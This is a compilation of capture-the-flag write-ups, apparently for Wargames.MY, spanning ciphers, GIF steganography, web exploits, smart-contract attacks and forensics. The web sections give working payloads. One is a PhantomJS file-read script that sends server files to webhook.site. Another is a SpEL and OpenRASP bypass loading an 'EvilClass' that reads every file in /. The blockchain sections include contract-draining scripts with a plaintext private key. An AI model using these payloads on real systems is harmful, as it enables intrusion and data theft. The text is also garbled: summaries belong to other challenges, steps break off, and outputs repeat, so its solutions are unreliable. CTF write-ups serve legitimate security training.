Description: We found a leak of a blackmarket website’s login credentials. Can you find the password of the user osman and successfully decrypt it
Solution
Files Provided
passwd.txt: A large file containing numerous lines of hash-like or seemingly random strings, some of which appear in a special format (e.g., ZJPB{...}).
user.txt: A text file listing many usernames, including the target user osman.
Goal
Identify which line in passwd.txt corresponds to the user osman.
Extract and decrypt the user’s password.
Present the password in the final flag format: wgmy{...}.
Solution
Step 1: Matching the User to the Password
We are given two files:
user.txt: A list of users (one username per line).
passwd.txt: A similarly sized list of hashed/encoded/obfuscated passwords (one per line).
In typical username-password leaks, the order of lines in user.txt maps directly to the order in passwd.txt. This means:
Line N in user.txt corresponds to Line N in passwd.txt.
Steps:
Scroll through user.txt (or search) to find the line containing osman.
Note its line number.
Step 2: Inspecting the Corresponding Line in passwd.txt
Using the line number from user.txt, locate the corresponding line in passwd.txt. For example, suppose the line contains:
ZJPB{e6g180g9f302g8d8gddg1i2174d0e212}
Observations:
The segment outside the braces is ZJPB.
The segment inside the braces is e6g180g9f302g8d8gddg1i2174d0e212.
We are given a hint that the flag format should be wgmy{...}. This implies a relationship between ZJPB and wgmy.
Step 3: Recognizing the Cipher Shift
Comparing ZJPB with wgmy, we observe:
Each letter has shifted backwards by 3 positions in the alphabet.
Uppercase letters become lowercase:
Thus, ZJPB becomes wgmy.
Step 4: Decoding the Braced String
Inside the braces, apply the same -3 shift to each letter. Digits remain unchanged. For example:
e6g180g9f302g8d8gddg1i2174d0e212
Decoded result:
b6d180d9c302d8a8daad1f2174a0b212
Step 5: Constructing the Final Flag
To construct the final flag, replace ZJPB with wgmy and use the decoded string:
wgmy{b6d180d9c302d8a8daad1f2174a0b212}
Final Answer
The decrypted password (and final flag) for osman is:
wgmy{b6d180d9c302d8a8daad1f2174a0b212}
Summary
Matched the username osman to the correct line in passwd.txt.
Decoded the ZJPB{...} string using a -3 shift cipher.
Presented the final flag in the required format.
Remarks/Tags/Lesson Learned
Sequential Mapping: Always consider the possibility of one-to-one mapping in files like user.txt and passwd.txt when no additional information is provided.
Cipher Recognition: Simple substitution ciphers (e.g., Caesar cipher with a fixed shift) are commonly used in CTF challenges. Knowing how to identify and decode them is essential.
Attention to Details: Recognizing patterns such as uppercase-to-lowercase conversion and numeric invariance can simplify decoding tasks.
Iterative Problem Solving: Breaking the challenge into smaller steps (e.g., matching, inspecting, decoding, constructing) ensures clarity and minimizes errors.
Flag Formats: Understanding the expected format (wgmy{...}) can guide your decoding process and validate your final result.
Hohoho 3 - CRC Affine Linearity Exploitation
Description: Santa Claus is coming to town! Send your wishes by connecting to the netcat service!
Solution
Files Provided
server.py: The server script containing the logic for registering, logging in, and interacting with the "wishlist."
Goal
Recover the secret value m from the server's token generation process.
Generate Santa's valid token using the recovered m.
Log in as Santa Claus and access the wishlist.
Extract the flag from the wishlist.
Solution
Step 1: Analyze the Code
The server script uses a custom token generation process:
A random 128-bit value m is generated at runtime.
The generateToken function computes a CRC-like value using m and the provided name.
The user provides a name and a token. The server verifies the token using the same logic.
We aim to recover m by analyzing name-token pairs.
Step 2: Collect Name-Token Pairs
The script relies on deterministic token generation. By collecting multiple name-token pairs, we can set up a system of equations to solve for m.
We wrote a script (recover_m_z3.py) to solve for m:
from z3 import *
import binascii
# Initialize Z3 solver
solver = Solver()
# Define m as a 128-bit BitVec
m = BitVec('m', 128)
# Function to process each name-token pair
def hex_to_int(hex_str):
return int(hex_str, 16)
# Add constraints for each name-token pair
for name, token_hex in name_token_pairs:
token_int = hex_to_int(token_hex)
crc = BitVecVal((1 << 128) - 1, 128)
for b in name.encode('utf-8'):
crc ^= b
for _ in range(8):
crc = If(crc & 1, LShR(crc, 1) ^ m, LShR(crc, 1))
solver.add(crc ^ ((1 << 128) - 1) == token_int)
# Solve for m
if solver.check() == sat:
model = solver.model()
m_val = model[m].as_long()
print(f"Recovered m: {hex(m_val)}")
Running the script gives:
Recovered m: 0xe981fb1981bf7f1d6ce59b947e92934f
Step 4: Generate Santa's Token
Using the recovered m, we generate a valid token for "Santa Claus":
This list reorders the indices of the hex string. The new string S' is constructed by mapping:
S'[0] = S[25]
S'[1] = S[10]
S'[2] = S[0]
...
Applying this reordering gives the final string:
51fadeb6cc77504db336850d53623177
Step 4: Wrap as Flag
Wrap the resulting string in the standard CTF flag format:
WGMY{51fadeb6cc77504db336850d53623177}
Final Answer
The decrypted flag is:
WGMY{51fadeb6cc77504db336850d53623177}
Summary
Extracted the first byte from each 4-byte value in the DICOM metadata.
Converted these bytes from hex to ASCII, forming an intermediate string.
Used the provided scramble list to reorder the string and reveal the hidden data.
Wrapped the result in the standard flag format.
Remarks/Tags/Lesson Learned
Metadata Analysis: Private metadata tags in DICOM files can store hidden information that requires manual extraction.
Hexadecimal Conversion: Understanding hex-to-ASCII conversion is essential for decoding hidden strings in binary files.
Scramble Lists: Challenges often involve reordering data using scramble lists. Automating this process with scripts can save time.
CTF Practices: Breaking challenges into smaller steps—like extraction, conversion, and reordering—ensures a systematic and accurate solution.
Christmas GIFt - GIF Frame Extraction
Description: Here is your christmas GIFt from santa! Just open and wait for it..
Solution
Files Provided
gift.gif: A GIF file that contains hidden information across its frames.
Goal
Analyze the GIF file to extract hidden data.
Find the flag embedded within the file.
Solution
Step 1: Analyze the File Metadata
Using exiftool, we inspect the metadata of gift.gif:
└─$ exiftool -a gift.gif
ExifTool Version Number : 12.76
File Name : gift.gif
Directory : .
File Size : 38 MB
File Modification Date/Time : 2024:12:28 00:26:21-05:00
File Access Date/Time : 2024:12:29 03:16:14-05:00
File Inode Change Date/Time : 2024:12:28 00:27:48-05:00
File Permissions : -rwxrwx---
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 480
Image Height : 480
Has Color Map : Yes
Color Resolution Depth : 8
Bits Per Pixel : 8
Background Color : 0
Frame Count : 1402
Duration : 917492.00 s
Image Size : 480x480
Megapixels : 0.230
Key Observations:
The file contains 1402 frames.
The hidden data is likely embedded in the last frame, as suggested by the challenge description.
Step 2: Extract Frames
To examine the frames, we use GIMP or any frame extraction tool to render all 1402 frames. Follow these steps in GIMP:
Open gift.gif.
The software automatically renders all 1402 frames as separate layers.
Navigate to the last frame.
Step 3: Locate the Flag
Upon inspecting the 1402nd frame, the following flag is revealed:
wgmy{1eaa6da7b7f5df6f7c0381ca93af4d3}
Final Answer
The extracted flag is:
wgmy{1eaa6da7b7f5df6f7c0381ca93af4d3}
Summary
Metadata Analysis: We analyzed the metadata of the GIF file and identified that it contained 1402 frames.
Frame Extraction: Using GIMP, we rendered all frames and inspected the final frame.
Flag Retrieval: The flag was found embedded in the last frame of the GIF.
Remarks/Tags/Lesson Learned
Frame Analysis: When working with GIF files, extracting and analyzing individual frames can reveal hidden information.
Metadata Inspection: Tools like exiftool are essential for identifying important details such as frame counts and durations.
CTF Techniques: Challenges involving GIFs often hide data in specific frames, requiring systematic examination of the entire file.
Tool Familiarity: Knowledge of image manipulation software like GIMP is invaluable for frame-based challenges.
Invisble Ink - GIF Transparency Steganography
Description: The flag is hidden somewhere in this GIF. You can't see it? Must be written in transparent ink.
Solution
Files Provided
challenge.gif: A GIF file with multiple frames, some of which contain hidden data.
Goal
Extract the hidden flag embedded within the frames of the GIF.
Solution
Step 1: Analyze the File Metadata
Using exiftool, we inspect the metadata of challenge.gif:
└─$ exiftool -a challenge.gif
ExifTool Version Number : 12.76
File Name : challenge.gif
Directory : .
File Size : 60 kB
File Modification Date/Time : 2024:12:27 13:44:00-05:00
File Access Date/Time : 2024:12:28 02:14:11-05:00
File Inode Change Date/Time : 2024:12:27 15:33:03-05:00
File Permissions : -rwxrwx---
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 400
Image Height : 400
Has Color Map : Yes
Color Resolution Depth : 1
Bits Per Pixel : 8
Background Color : 0
Animation Iterations : Infinite
Transparent Color : 2
Frame Count : 7
Duration : 4.02 s
Image Size : 400x400
Megapixels : 0.160
Key Observations:
The file contains 7 frames.
Transparency is used, suggesting hidden information might be embedded using alpha layers or color maps.
Step 2: Analyze Frames
To examine the individual frames, we use Stegsolve.jar:
Open challenge.gif in Stegsolve.
Use the Frame Browser function to analyze all 7 frames.
Frames 5 and 6 show unusual visuals, indicating they likely contain the hidden flag.
Step 3: Save and Analyze Frames 5 and 6
Save frames 5 and 6 as separate PNG files.
Open frame 5 in Stegsolve and apply the Alpha Plane 7 filter. This reveals half of the flag.
Save the processed frame 5 as a new PNG file.
Open frame 6 in Stegsolve and apply the Random Color Map 3 filter. This reveals the other half of the flag.
Save the processed frame 6 as another new PNG file.
Step 4: Combine Processed Frames
Open the processed frame 5 in Stegsolve.
Use the Image Combiner function to merge it with the processed frame 6.
The full flag is now visible.
Step 5: Extract the Flag
The combined image reveals the flag:
wgmy{41d8cd98f00b204e9800998ecf8427e}
Final Answer
The extracted flag is:
wgmy{41d8cd98f00b204e9800998ecf8427e}
Summary
Metadata Analysis: We analyzed the GIF's metadata and identified frames 5 and 6 as containing hidden data.
Frame Extraction: Using Stegsolve, we examined individual frames and applied appropriate filters.
Flag Reconstruction: Combining the processed frames revealed the complete flag.
Remarks/Tags/Lesson Learned
Transparency Layers: Hidden data in GIFs often utilizes transparency or alpha channels. Familiarity with these techniques is crucial.
Frame Browser for GIFs: Using the Frame Browser function in tools like Stegsolve allows for easy separation and inspection of frames, which is essential for identifying where data is embedded.
Filters in Stegsolve: Different filters (e.g., Alpha Plane or Random Color Map) can reveal obscured information in images, highlighting the importance of trying various options.
Image Combining: When fragments of information are spread across frames, combining processed images systematically can uncover the full hidden data.
Tool Expertise: Developing proficiency with tools like Stegsolve not only aids in solving challenges but also improves efficiency in recognizing common steganography patterns in CTFs.
Watermarked? - Steganography with Watermark Anything
Description: Got this from social media, someone said it's watermarked, is it?
Solution
Files Provided
watermarked.gif: A GIF file with multiple frames, potentially containing hidden watermarks.
Goal
Split the GIF into individual frames for processing.
Decode watermarks embedded in each frame using the "Watermark Anything" framework.
Compile the extracted messages to identify any coherent data, such as a flag or meaningful text.
Solution
Step 1: Frame Extraction
The GIF was split into 78 individual frames using the ffmpeg tool.
This command created PNG images named sequentially (e.g., frame_001.png, frame_002.png).
Step 2: Watermark Decoding
Each frame was processed using the following Python script leveraging the "Watermark Anything" framework:
import os
import numpy as np
from PIL import Image
import torch
import torch.nn.functional as F
from watermark_anything.data.metrics import msg_predict_inference
from notebooks.inference_utils import (
load_model_from_checkpoint,
default_transform,
msg2str,
multiwm_dbscan,
)
# Device setup: Use GPU if available, otherwise fallback to CPU
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Function to load images
def load_img(path):
img = Image.open(path).convert("RGB")
img = default_transform(img).unsqueeze(0).to(device) # Transform and add batch dimension
return img
# Load the Watermark Anything model from checkpoint
exp_dir = "checkpoints"
json_path = os.path.join(exp_dir, "params.json")
ckpt_path = os.path.join(exp_dir, "wam_mit.pth")
wam = load_model_from_checkpoint(json_path, ckpt_path).to(device).eval()
# Function to convert binary to ASCII
def binary_to_ascii(binary_string):
n = 8 # 8 bits per character
ascii_text = "".join(
chr(int(binary_string[i:i + n], 2)) for i in range(0, len(binary_string), n)
)
return ascii_text
# Function to detect and decode a watermark
def detect_watermark(image_path, wam):
# Load and preprocess the image
img_pt = load_img(image_path)
# Detect the watermark in the image
preds = wam.detect(img_pt)["preds"] # Predictions: [1, 33, 256, 256]
mask_preds = F.sigmoid(preds[:, 0, :, :]) # Predicted mask: [1, 256, 256]
bit_preds = preds[:, 1:, :, :] # Predicted bits: [1, 32, 256, 256]
# Decode the message
pred_message = msg_predict_inference(bit_preds, mask_preds).cpu().float() # [1, 32]
binary_message = "".join(str(int(bit)) for bit in pred_message[0].tolist()) # Convert to binary string
ascii_message = binary_to_ascii(binary_message) # Convert binary to ASCII
return ascii_message
# Parameters
img_dir = "frames" # Directory containing the extracted frames
output_file = "decoded_messages.txt" # File to save all decoded messages
# Process each frame and compile decoded messages
print(f"Processing frames from: {img_dir}")
all_decoded_messages = []
for frame_file in sorted(os.listdir(img_dir)):
if not frame_file.endswith(".png"):
continue
frame_path = os.path.join(img_dir, frame_file)
# Detect and decode watermark
print(f"Detecting watermark in frame: {frame_file}")
decoded_message = detect_watermark(frame_path, wam)
all_decoded_messages.append(f"Frame {frame_file}: {decoded_message}")
print(f"Decoded Message: {decoded_message}")
# Save all decoded messages to a single file
with open(output_file, "w") as f:
f.write("\n".join(all_decoded_messages))
print(f"\nAll decoded messages have been saved to {output_file}")
Key Notes:
The script utilized the "Watermark Anything" framework available on GitHub.
It was executed in the provided Colab notebook for GPU acceleration.
Step 3: Key Output
Decoded messages from frames 42 to 54 revealed the flag:
The response contains the flag in the data section.
Final Answer
The extracted flag is:
wgmy{1bc665d324c5bd5e7707909d03217681}
Summary
Service Account Token Extraction: Used LFI to access the Kubernetes service account token.
Vault Authentication: Authenticated with the Vault API using the service account token to obtain a client token.
Flag Retrieval: Queried the Vault to extract the flag.
Remarks/Tags/Lesson Learned
LFI Exploitation: Leveraging directory traversal vulnerabilities can expose sensitive credentials like service account tokens.
Vault Access: Properly securing Vault authentication methods is crucial to prevent unauthorized access.
IP Restrictions: Misconfigured access controls (e.g., allowing spoofed IPs) can undermine security measures.
Time-Sensitive Tokens: The use of short-lived tokens increases the complexity for attackers but can still be exploited if immediate actions are possible.
Dear Admin - Twig Template Injection
Description: Capture the admin's heart with your poetic words, and they might share their secrets in return. ðŸŽ
Solution
Files Provided
Source Code: Includes index.php and admin.php files.
The register_argc_argv=On setting allows passing arguments via argv to the PHP script.
Twig’s --templatesPath argument can be used to specify a custom template path.
Reference:
The research article on Assetnote explains how to exploit this feature: https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms
Blacklist Limitations: Function blacklists are insufficient for securing applications against determined attackers.
WordMarket - WooCommerce Plugin LFI Exploit
Description: I’ve set up a WordPress eCommerce site for a client. Can you check if it’s secure enough for production? Give it a look and see if anything stands out.
Solution
Files Provided
WordPress Instance: Includes WooCommerce plugin and custom plugins.
Plugins:
cities-shipping-zones-for-woocommerce
wgmy-functions
Tools Used
curl: For interacting with WordPress REST API and admin-ajax endpoints.
Burp Suite: For intercepting and modifying HTTP requests.
Goals
Exploit the custom plugin (wgmy-functions) to retrieve a secret.
Leverage the secret to create a new WordPress user with administrative privileges.
Use the cities-shipping-zones-for-woocommerce plugin to achieve Local File Inclusion (LFI) and extract the flag.
Solution
Step 1: Analyze the wgmy-functions Plugin
REST Endpoint to Add User:
The user_creation_menu function allows adding a new user if the correct secret is provided.
Exploit the PhantomJS CVE-2019-17221 vulnerability.
Read sensitive files from the server.
Retrieve admin credentials.
Log in to the admin dashboard and retrieve the flag.
Solution
Step 1: Analyze the Report Functionality
The report.php file lets users submit a URL for the admin bot to check. The admin bot runs PhantomJS version 2.1.1, which is vulnerable to CVE-2019-17221, allowing arbitrary file reads.
We exploit PhantomJS by hosting a malicious page that uses an XMLHttpRequest (XHR) to read local files via the file:// protocol. The payload is designed to extract the contents of /var/www/html/report.php.
Malicious HTML payload:
<html>
<head></head>
<body>
<script>
x = new XMLHttpRequest();
x.onload = function() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://webhook.site/YOUR-UID", true);
xhr.send(JSON.stringify({ response: this.responseText }));
};
x.open("GET", "file:///var/www/html/report.php");
x.send();
</script>
</body>
</html>
Step 3: Execute the Exploit
Host the malicious HTML page on a server.
Submit the hosted page’s URL to the report.php form.
Capture the admin bot’s response via a webhook.
Step 4: Extract the Admin Credentials
The response reveals the content of report.php, which includes the following:
Executes user-provided SpEL expressions using SpelExpressionParser.
Implements OpenRASP, which blocks runtime-level malicious actions.
Step 2: Analyze the Exploitation Path
Despite restrictions, we can bypass the WAF by using:
String concatenation: T ("..." + "...")
Space manipulation: T ( instead of T(
Step 3: Load a Custom Class
The OpenRASP protection can be bypassed by loading a custom-crafted Java class using Spring Framework libraries. This involves:
Crafting the Payload:
Use T(org.springframework.cglib.core.ReflectUtils).defineClass to load the class.
Base64 encode the custom class and decode it using T(org.springframework.util.Base64Utils).decodeFromString.
Creating the Evil Class: Write and compile a malicious class (EvilClass.java) to read all files in /:
public class EvilClass {
public static String result;
static {
StringBuilder contentBuilder = new StringBuilder();
try {
java.io.File rootDir = new java.io.File("/");
java.io.File[] files = rootDir.listFiles();
if (files != null) {
for (java.io.File file : files) {
try {
if (file.isFile() && file.canRead()) {
contentBuilder.append(java.nio.file.Files.readString(file.toPath()));
}
} catch (Exception ignored) {}
}
}
} catch (Exception ignored) {}
result = contentBuilder.toString();
}
}
Base64 Encoding the Compiled Class:
base64 -i EvilClass.class
Step 4: Craft the Payload
Modify the payload to load the custom class and access its static result field:
T (org.springframework.cglib.core.ReflectUtils).defineClass(
'EvilClass',
T (org.springframework.util.Base64Utils).decodeFromString('BASE64_ENCODED_CLASS_HERE'),
T (org.springframework.util.ClassUtils).getDefaultClassLoader()
).getField('result').get(null)
Replace BASE64_ENCODED_CLASS_HERE with the Base64-encoded string of the compiled EvilClass.class.
Step 5: Execute the Payload
Send the crafted payload to the application through the provided SpEL execution interface. The payload will:
Load the custom EvilClass.
Execute its static initializer block to read file contents.
Retrieve the file data via EvilClass.result.
Final Step: Retrieve the Flag
By executing the payload, the flag is revealed:
Flag: wgmy{d409e3cc65fd8e1d89a9d226efad3a10}
Blockchain
Guess it - Storage Slot Manipulation
Description: Santa Clause has been kidnapped and is kept in a secret dungeon, can u unlock this contract and save him?
Solution
Files Provided
Setup.sol: Deploys the GuessIt contract and verifies if the challenge is solved.
GuessIt.sol: Contains the main challenge logic, including a key stored in a specific storage slot.
Goal
Calculate the correct storage slot based on the contract's logic.
Retrieve the key stored at the slot.
Send a transaction to unlock the contract.
Retrieve the flag upon solving the challenge.
Solution
Step 1: Launching the Instance
The challenge starts by launching an instance of the smart contract using the provided curl command:
Using the provided RPC endpoint, connect to the private blockchain network:
Code:
from web3 import Web3
# Connect to the blockchain
rpc_url = "http://blockchain.wargames.my:4447/4f4bd1e4-7e25-4f89-9b43-bd26c9150315"
web3 = Web3(Web3.HTTPProvider(rpc_url))
# Check connection
if web3.isConnected():
print("Connected to the blockchain!")
else:
print("Failed to connect to blockchain.")
Output:
Connected to the blockchain!
Step 3: Calculating the Storage Slot
The key is stored in the contract's storage. Calculate the correct storage slot using the keccak256 hash of the isKey constant and the mapping's position.
Code:
# Mapping slot calculation
IS_KEY = 0x1337
MAPPING_POSITION = 1 # Mapping is the second state variable
def calculate_mapping_slot():
key = IS_KEY.to_bytes(32, 'big')
slot = MAPPING_POSITION.to_bytes(32, 'big')
slot_bytes = key + slot
return Web3.keccak(slot_bytes)
slot = calculate_mapping_slot()
print(f"Calculated slot: {slot.hex()}")
# Fetch the key stored at the calculated slot
value = web3.eth.get_storage_at('0x0ec59EE2D7b905e0FFdD59f268dE8Dbd8FEfA4D3', slot)
print(f"Value at calculated slot: {value.hex()}")
Output:
Value at calculated slot: 51f426e740b6b01d82a449b94634e178ddffec64b3a020729d0b246922b24c38
Step 5: Unlocking the Contract
Send a transaction to call the unlock function in the contract using the retrieved key:
Code:
from eth_account import Account
# Setup account using private key
private_key = '0x864403f16d3d81b0bb310c53afe7fadf4f1bcc0db64bf6165e4f0c32cab846be'
account = Account.from_key(private_key)
# Prepare the transaction
nonce = web3.eth.get_transaction_count(account.address)
function_sig = web3.keccak(text='unlock(uint256)')[:4].hex()
parameter = hex(int.from_bytes(slot, 'big'))[2:].zfill(64) # Convert slot to uint256
data = function_sig + parameter
transaction = {
'nonce': nonce,
'gasPrice': web3.eth.gas_price,
'gas': 100000,
'to': '0x0ec59EE2D7b905e0FFdD59f268dE8Dbd8FEfA4D3',
'value': 0,
'data': '0x' + data,
'chainId': web3.eth.chain_id
}
# Sign and send the transaction
signed = web3.eth.account.sign_transaction(transaction, private_key)
tx_hash = web3.eth.send_raw_transaction(signed.raw_transaction)
print(f"Transaction hash: {tx_hash.hex()}")
# Wait for receipt
receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
print(f"Transaction was successful: {receipt['status'] == 1}")
Output:
Transaction hash: 7a642cdac2ff3474b4ef00a4912e33f4aa1ee5cc4ec559d71677a8d4f056dc7a
Transaction was successful: True
Step 6: Retrieving the Flag
After successfully unlocking the contract, return to the challenge interface and retrieve the flag:
wgmy{85e5f76ac597ec9234fa3bd968c3d83b}
Final Answer
The extracted flag is:
wgmy{85e5f76ac597ec9234fa3bd968c3d83b}
Summary
Instance Setup: The blockchain instance was initialized with provided credentials.
Storage Slot Calculation: The correct storage slot was calculated using the keccak256 hash function.
Key Retrieval: The key stored in the calculated slot was fetched from the contract's storage.
Contract Unlocking: A transaction was crafted and sent to unlock the contract using the retrieved key.
Flag Retrieval: The successful transaction enabled the retrieval of the hidden flag.
Remarks/Tags/Lesson Learned
Storage Analysis: Understanding how Ethereum contracts store data in storage slots is essential for solving smart contract challenges.
Keccak256 Usage: Calculating mapping slots with keccak256 is a critical skill for analyzing contract storage.
Web3.py Proficiency: Familiarity with Web3.py allows efficient interaction with Ethereum-based blockchains.
Transaction Crafting: Knowledge of ABI encoding and crafting function calls is vital for smart contract interactions.
Debugging Blockchain Interactions: Iteratively checking connection, storage data, and transaction results ensures accurate solutions.
Dungeons and Naga - Smart Contract Exploit
Description: The developer of this protocol really loves the movie so he decided to build a decentralized game out of it that lives on chain. He has spent all his life saving and really want the game to succeed. The game sets you on an adventure to find hidden treasure.
Solution
Files Provided
Setup.sol: Deploys the DungeonsAndDragons contract, funds it with 100 ETH, and defines the challenge's success condition (draining the contract balance to zero).
DungeonsAndDragons.sol: Implements game mechanics such as creating characters, completing dungeons, fighting monsters, and defeating the final dragon.
Goal
Predict the randomness used in the game's mechanics.
Level up the character quickly by exploiting vulnerabilities.
Defeat the final dragon to drain the contract balance.
Retrieve the flag after completing the challenge.
Solution
Step 1: Launching the Instance
To start the challenge, launch the blockchain instance using the provided curl command:
Using the RPC endpoint, connect to the private blockchain network and retrieve the game contract address:
Code:
from web3 import Web3
# Connect to the network
RPC_URL = 'http://blockchain.wargames.my:4449/423d3320-517d-4fc9-9d38-c616de80333c'
w3 = Web3(Web3.HTTPProvider(RPC_URL))
# Check connection
if w3.isConnected():
print("Connected to the blockchain!")
else:
print("Failed to connect to blockchain.")
# Retrieve the deployed game contract address
SETUP_CONTRACT = w3.to_checksum_address('0x2b740CAE2DCc7548aA73b01B220f01Af2ec2ebC7')
setup_contract = w3.eth.contract(address=SETUP_CONTRACT, abi=setup_abi)
game_address = setup_contract.functions.challengeInstance().call()
print(f"Game contract: {game_address}")
Output:
Connected to the blockchain!
Game contract: 0xdBB4b4413d739075D864C94ccDd96acF2a08c24B
Step 3: Exploiting Predictable Randomness
The fateScore in functions such as fightMonster() and finalDragon() is derived from:
Transaction hash: 7a642cdac2ff3474b4ef00a4912e33f4aa1ee5cc4ec559d71677a8d4f056dc7a
Transaction was successful: True
Step 6: Retrieving the Flag
After defeating the final dragon, return to the challenge interface and retrieve the flag:
wgmy{ff3d6f1db65a7c5e9da544a5dcbe3599}
Final Answer
The extracted flag is:
wgmy{ff3d6f1db65a7c5e9da544a5dcbe3599}
Summary
Instance Setup: The blockchain instance was initialized with provided credentials.
Randomness Exploitation: Predictable randomness was exploited to guarantee success in battles.
Level-Up Exploitation: Weak monsters were created and repeatedly fought to level up rapidly.
Dragon Fight: The final dragon was defeated using the predicted fateScore.
Flag Retrieval: The successful transaction drained the contract balance, enabling flag retrieval.
Remarks/Tags/Lesson Learned
Predictable Randomness: Understanding and exploiting randomness in contract logic is critical for smart contract challenges.
Game Mechanics: Manipulating in-game mechanics such as monster creation can provide shortcuts to success.
Web3.py Usage: Familiarity with Web3.py enables efficient interaction with Ethereum-based blockchains.
Iterative Debugging: Step-by-step validation ensures smooth execution, from connecting to the blockchain to retrieving the flag.
Transaction Crafting: Proficiency in crafting transactions with ABI encoding is essential for smart contract interaction.
Death Star 2.0 - Reentrancy Attack
Description: The Death Start is under development but the darkside ran out of funds, so they reached out to the public to help. Can you stop the Death Star from being developed?
Solution
Files Provided
DarksidePool.sol: Interacts with the DeathStar contract, allowing ETH deposits and withdrawals. Contains utility functions but no vulnerabilities.
DeathStar.sol: Implements the core functionality and includes a critical reentrancy vulnerability in the withdrawEnergy function.
Setup.sol: Deploys and funds the DeathStar and DarksidePool contracts. Marks the challenge as solved when the DeathStar contract’s balance is drained.
Goal
Identify and exploit the reentrancy vulnerability in the withdrawEnergy function.
Deploy an exploit contract to recursively withdraw funds.
Drain the DeathStar contract’s balance to zero.
Retrieve the flag upon successful exploitation.
Solution
Step 1: Launching the Instance
To initiate the challenge, launch the blockchain instance using the provided curl command:
After draining the contract’s balance, retrieve the flag:
wgmy{0427d006d35c9bac85b47defbfe5793a}
Final Answer
The extracted flag is:
wgmy{0427d006d35c9bac85b47defbfe5793a}
Summary
Instance Setup: The blockchain instance was initialized with provided credentials.
Reentrancy Analysis: The vulnerability in withdrawEnergy was identified.
Exploit Deployment: An exploit contract was deployed to recursively withdraw funds.
Contract Draining: The DeathStar contract’s balance was successfully drained.
Flag Retrieval: The challenge was solved, and the flag was retrieved.
Remarks/Tags/Lesson Learned
Reentrancy Exploitation: Understanding how reentrancy vulnerabilities work is essential for smart contract security.
Exploit Development: Writing a custom exploit contract highlights the importance of attack vector identification.
Web3.py Utilization: Effective use of Web3.py simplifies blockchain interaction and automation.
Iterative Debugging: Verifying contract state and transaction success ensures a systematic approach to solving challenges.
Smart Contract Auditing: Analyzing withdrawal patterns and state updates can reveal critical vulnerabilities.
Forensic
I Cant Manipulate People - ICMP Packet Analysis
Description: Partial traffic packet captured from a hacked machine. Can you analyze the provided pcap file to extract the message from the packet, perhaps by reading the packet data?
Solution
File Provided
traffic.pcap: A packet capture file containing network traffic.
Goal
Analyze the packets to extract the hidden message.
Reconstruct the flag by reading the packet data sequentially.
Solution
Step 1: Analyzing the File
Open the traffic.pcap file using Wireshark:
Inspect the overall structure of the captured packets.
Notice that all packets contain ICMP protocol information, with the message "(no response found!)."
Step 2: Filtering ICMP Packets
Apply a filter to focus on ICMP packets in Wireshark:
icmp
This filter isolates ICMP request packets, which are key to extracting the hidden data.
Step 3: Reading Packet Data
Click on each ICMP packet in the filtered list.
Navigate to the Data section in the packet details pane.
Sequentially read the ASCII representation of the payload in each packet's data field.
Combine the data from all ICMP packets to reconstruct the hidden message.
Step 4: Reconstructing the Flag
After reading all ICMP packet data, the following hidden message was reconstructed:
wgmy{1e3b71d57e466ab71b43c2641a4b34f4}
Final Answer
The extracted flag is:
wgmy{1e3b71d57e466ab71b43c2641a4b34f4}
Summary
Packet Analysis: Opened the provided traffic.pcap file in Wireshark and analyzed the packet structure.
ICMP Filtering: Applied an ICMP filter to isolate relevant packets containing hidden data.
Data Extraction: Read the ASCII representation of the payload from each ICMP packet sequentially.
Flag Reconstruction: Combined the extracted data to reconstruct the hidden message.
Remarks/Tags/Lesson Learned
Protocol Filtering: Using Wireshark filters (e.g., icmp) effectively isolates relevant traffic, making analysis more efficient.
Payload Analysis: Hidden messages often reside in packet payloads, requiring careful inspection of individual data fields.
Sequential Reconstruction: Extracting and combining data sequentially ensures accurate recovery of hidden messages.
Wireshark Expertise: Proficiency with Wireshark's filtering and data navigation features is invaluable for network traffic analysis challenges.
Unwanted Meow - Data Corruption Repair
Description: Uh... Oh... Help me! I was just browsing funny cat memes. When I clicked to download a cute cat picture, the file that was downloaded seemed a little bit weird. I accidentally ran the file, and now my files are shredded. Ugh, now I hate cats meowing at me.
Solution
File Provided
flag.shredded: A corrupted file that needs to be repaired to extract the flag.
Goals
Analyze the file to identify its true format.
Repair the file to restore its original content.
Extract the flag embedded within the repaired file.
Solution
Step 1: Analyzing the File
Using hexed.it, the file was inspected for anomalies:
The header revealed a JFIF file signature (FF D8 FF E0), indicating it is a JPEG image.
However, the file could not be opened as an image.
Further inspection revealed multiple occurrences of the string "meow" in the hex data, which corrupted the file.
Step 2: Cleaning the File Using xxd and sed
To remove all occurrences of "meow" (hex values 6D65 6F77) from the file:
Convert the file to a plain hex dump using xxd.
Use sed to remove all instances of "meow" in the hex data.
Convert the cleaned hex dump back to binary using xxd -r.
Since the corruption occurred multiple times, repeat the process three times to completely remove all instances of "meow."
After cleaning the file, it was saved as clean_flag.jpeg.
The repaired file was opened in an image viewer.
The image successfully opened, revealing a picture containing the flag.
Step 4: Extracting the Flag
Upon opening the repaired image, the flag was visible in the content:
WGMY{4a4be40c96ac6314e91d93f38043a634}
Final Answer
The extracted flag is:
WGMY{4a4be40c96ac6314e91d93f38043a634}
Summary
File Analysis: The corrupted file was identified as a JPEG image by analyzing its JFIF header.
Corruption Source: The corruption was caused by extraneous "meow" strings embedded in the hex data.
File Repair: Removing all instances of "meow" using xxd and sed restored the file.
Flag Extraction: The repaired image successfully displayed the hidden flag.
Remarks/Tags/Lesson Learned
File Format Identification: Analyzing file headers provides critical clues about the true format of corrupted files.
Hex Editing: Tools like xxd and sed are invaluable for detecting and repairing anomalies in binary files.
Iterative Cleaning: Repeated cleaning ensures complete removal of corruption, especially when anomalies occur multiple times.
JPEG Repair: Understanding JPEG structure (e.g., JFIF headers) is crucial for restoring corrupted images.
Systematic Debugging: Breaking the process into analysis, cleaning, validation, and extraction ensures an organized approach to solving file corruption challenges.
Tricky Malware - Memory Dump and Network PCAP Analysis
Description: My SOC detected there are Ransomware that decrypt file for fun. The script kiddies is so tricky. Here some evidence that we successfully retrieve.
Solution
Files Provided
Evidence.rar:
memdump.mem: A memory dump file.
network.pcap: A network capture file.
Tools Used
Volatility3: For memory analysis.
IDA: For decompiling and analyzing executables.
pyinstxtractor: For unpacking PyInstaller-packed executables.
Analyzed Crypt.exe in IDA and identified it as a PyInstaller-packed executable.
